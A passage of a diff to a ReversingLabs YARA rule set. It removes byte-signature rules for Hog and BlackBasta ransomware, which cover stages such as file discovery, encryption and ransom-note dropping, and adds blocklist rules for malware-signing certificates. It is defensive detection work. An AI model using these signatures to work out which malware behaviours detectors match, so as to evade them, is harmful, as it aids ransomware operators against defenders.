?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B - F8 89 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? F3 A5 8B 45 ?? 8D 8D ?? ?? ?? ?? 50 68 - ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 - FF D3 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 - } - condition: - uint16(0)==0x5A4D and $find_drives and $find_files and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ANAVERIS LIMITED" and pe.signatures[i].serial=="37:d3:6a:4e:61:c0:ac:68:ce:b8:bf:ce:f2:db:f2:83" and 1532476800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Hog : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_4321De10738278B93683Ca542407F103 : INFO FILE { meta: - description = "Yara rule that detects Hog ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b4f26acf-5ff1-5c49-8cfa-8f619af84efd" - date = "2021-10-12" - modified = "2021-10-12" + id = "bf800655-cde4-59fa-9574-1055522fe074" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Hog.yara#L1-L70" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c5cbc79fee9083ed3befa6b0d348f2d38064bb9012b8f0ca11afd7137243866d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14530-L14546" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2787375605310877891ef924268f4660d1c8aa020e00674c1b1d7eb3c4f5b2fb" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Hog" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $generate_key = { - 73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 1A 8D ?? ?? ?? ?? 0C 2B ?? 07 08 6F ?? ?? ?? ?? 08 - 16 28 ?? ?? ?? ?? 0D 06 72 ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 5E 28 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 26 02 25 17 59 10 ?? 16 30 ?? 06 6F ?? ?? ?? ?? 13 ?? DE ?? 07 2C ?? - 07 6F ?? ?? ?? ?? DC 11 ?? 2A - } - $find_files = { - 16 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 16 16 6F ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 00 1F - ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? - ?? ?? 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? - 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 7E ?? - ?? ?? ?? 6F ?? ?? ?? ?? 17 31 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? - ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C - 2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F ?? - ?? ?? ?? DC 28 ?? ?? ?? ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 26 28 ?? ?? ?? ?? - DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 2A - } - $encrypt_files_p1 = { - 02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? - ?? ?? ?? 31 ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? - ?? ?? ?? 06 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 19 - 73 ?? ?? ?? ?? 0B 02 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ?? - ?? 17 73 ?? ?? ?? ?? 0D 08 06 6F ?? ?? ?? ?? 16 06 6F ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ?? - 07 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC DE ?? 08 2C ?? 08 6F ?? ?? ?? - ?? DC DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 02 28 ?? - ?? ?? ?? DE ?? 26 DE ?? 2A - } - $encrypt_files_p2 = { - 73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 8D ?? ?? ?? - ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0B - 73 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 0D 09 07 16 07 8E 69 6F ?? ?? - ?? ?? 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 28 ?? ?? - ?? ?? 10 ?? DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 02 13 ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? - ?? DC 26 DE ?? 02 2A 11 ?? 2A - } - condition: - uint16(0)==0x5A4D and ($find_files) and ($generate_key) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "We Build Toolbars LLC" and pe.signatures[i].serial=="43:21:de:10:73:82:78:b9:36:83:ca:54:24:07:f1:03" and 1367884800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Blackbasta : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_2A6B2Df210Be14F4E18E10C7 : INFO FILE { meta: - description = "Yara rule that detects BlackBasta ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7c451fde-b8b1-5a35-855e-7e30f3e75cbb" - date = "2022-12-13" - modified = "2022-12-13" + id = "150773ee-5d85-522d-a693-63bb6a7d1de2" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.BlackBasta.yara#L1-L531" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c68671e51489af00e9e0cf28373e5ec01bda042653dbcca8843357eede41f27f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14548-L14564" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "24ae1664c35b7947e2e638bf620d9ab572c70df9cdc1403cc00b422a45ff9194" score = 75 - quality = 88 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + quality = 90 + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "BlackBasta" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? - ?? 83 C4 ?? 8B F0 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C6 - E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85 ?? ?? ?? ?? 89 9D ?? - ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 - 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 - ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? - ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? - 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 - } - $encrypt_files_v1 = { - 6A ?? E8 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? - ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 6A ?? 57 56 E8 ?? ?? ?? ?? 8D 4F - ?? 6A ?? 51 53 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A - ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 FF B5 ?? ?? ?? ?? 57 53 56 83 EC ?? 8B F4 89 A5 - ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D ?? E8 ?? - ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 - ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A - ?? FF B5 ?? ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? - ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 - ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 80 BD ?? ?? ?? ?? ?? - 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - } - $cmd_prompt = { - 8B FF 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? FC 53 56 8B 75 ?? 8D 45 ?? 33 DB - 68 ?? ?? ?? ?? 53 50 89 5D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 F8 ?? 0F 84 ?? - ?? ?? ?? 85 F6 75 ?? 53 39 5D ?? 75 ?? E8 ?? ?? ?? ?? 59 33 C0 E9 ?? ?? ?? ?? FF 75 - ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 85 F6 0F 94 C0 E9 ?? - ?? ?? ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 89 5D ?? 57 85 C0 74 ?? E8 - ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 53 89 18 8D 45 ?? 50 FF 75 ?? 53 E8 ?? ?? ?? ?? 83 - C4 ?? 8B F0 E8 ?? ?? ?? ?? 83 FE ?? 74 ?? 89 38 EB ?? 83 38 ?? 74 ?? E8 ?? ?? ?? ?? - 83 38 ?? 74 ?? 83 CE ?? FF 75 ?? E8 ?? ?? ?? ?? 59 EB ?? E8 ?? ?? ?? ?? 89 38 53 8D - 45 ?? B9 ?? ?? ?? ?? 50 51 53 89 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 E8 ?? ?? ?? ?? - 83 C4 ?? 8B C6 5F 8B 4D ?? 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 53 - } - $ldap_connect = { - C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? - 50 6A ?? 53 8B 35 ?? ?? ?? ?? FF D6 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 53 FF D6 - 6A ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ?? - 85 C0 74 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? - 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ?? - 8B F0 89 75 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 56 53 FF 15 ?? ?? ?? ?? 83 C4 ?? - 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? - ?? ?? ?? FF 75 ?? 57 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 8B - 06 85 C0 0F 84 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 50 8B 4D - ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 36 68 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C4 ?? 8B C8 89 4D ?? 8B 01 8B 40 ?? C6 45 ?? ?? 8B 44 08 ?? 8B 58 ?? 89 5D - ?? 8B 03 8B CB FF 50 ?? 83 4D ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 10 6A ?? - 8B C8 FF 52 ?? 0F B7 C0 89 45 ?? 83 65 ?? ?? C6 45 ?? ?? 85 DB 74 ?? 8B 03 8B CB FF - 50 ?? 8B C8 85 C9 74 ?? 8B 01 6A ?? FF 10 8B 45 ?? 50 8B 4D ?? E8 ?? ?? ?? ?? 8B 4D - ?? E8 ?? ?? ?? ?? 8B 5D ?? 56 FF 15 - } - $encrypt_files_v2 = { - 8D 45 ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 6A ?? 57 53 FF 75 ?? 83 EC ?? 8B - F4 89 A5 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D - ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? 8B 45 ?? 89 45 ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 - ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8 - ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 - } - $encrypt_files_v3 = { - 6A ?? E8 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? - ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 6A ?? 57 56 E8 ?? ?? ?? ?? 8D 4F - ?? 6A ?? 51 53 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A - ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 6A ?? 57 53 56 83 EC ?? 8B F4 89 A5 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D ?? E8 ?? ?? ?? ?? C6 - 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? - 89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF B5 ?? - ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 57 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? - 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 - ?? ?? 8D 8D ?? ?? ?? ?? E8 - } - $encrypt_files_v4 = { - 8D 45 ?? 50 E8 ?? ?? ?? ?? 0F 10 45 ?? 0F 11 45 ?? 0F 10 45 ?? 0F 11 45 ?? 8B 45 ?? - 8B 4D ?? 89 45 ?? 89 4D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? - 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 56 57 8D 45 ?? 50 8D 45 ?? 50 83 EC ?? 8B - F4 89 A5 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D - ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 6A ?? FF B5 ?? ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 - ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? EB ?? 8D 85 - ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8D 0C 4D ?? ?? ?? ?? 89 8D ?? ?? - ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B - 50 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 66 89 85 ?? ?? FF FF C6 - 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 - } - $drop_ransom_note_v1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 03 00 00 A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 - 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 - BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A - ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 - BD ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? - 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? - 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 - 5D C3 - } - $exclude_from_encryption_v1 = { - 83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D - ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 - ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B - F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D - 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? - 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? - ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ?? - ?? ?? ?? 83 FE ?? 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D - } - $exclude_from_encryption_v2_p1 = { - 50 C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? - ?? ?? C6 45 ?? ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 - 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? - ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ?? - E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6 - } - $exclude_from_encryption_v2_p2 = { - 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ?? - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? - ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 